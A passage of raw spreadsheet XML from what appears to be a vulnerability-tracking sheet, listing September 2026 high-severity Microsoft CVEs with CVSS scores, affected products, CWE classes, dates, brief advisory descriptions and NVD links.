      <c r="D172" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr"/>
      <c r="K172" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S172" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69686</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69712</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr"/>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Key Distribution Center allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69712</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69716</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K174" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S174" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69716</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69722</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr"/>
      <c r="K175" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S175" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69722</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69724</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K176" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L176" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S176" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69724</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69729</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr"/>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S177" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69729</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69740</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr"/>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S178" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69740</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69742</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr"/>
      <c r="K179" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t>
        </is>
      </c>
      <c r="L179" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S179" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69742</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69759</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr"/>
      <c r="K180" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L180" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S180" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69759</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69764</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr"/>
      <c r="K181" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L181" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S181" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69764</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69767</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr"/>
      <c r="K182" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="L182" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S182" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69767</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69772</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S183" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Network File System allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69772</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69778</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S184" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69778</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69784</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr"/>
      <c r="L185" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S185" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69784</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69797</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr"/>
      <c r="K186" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="L186" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q186" s="5" t="inlineStr"/>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S186" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69797</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69860</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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7" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S187" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69860</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70203</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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8" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q188" s="5" t="inlineStr"/>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S188" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70203</t>
        </is>
      </c>
    </row>
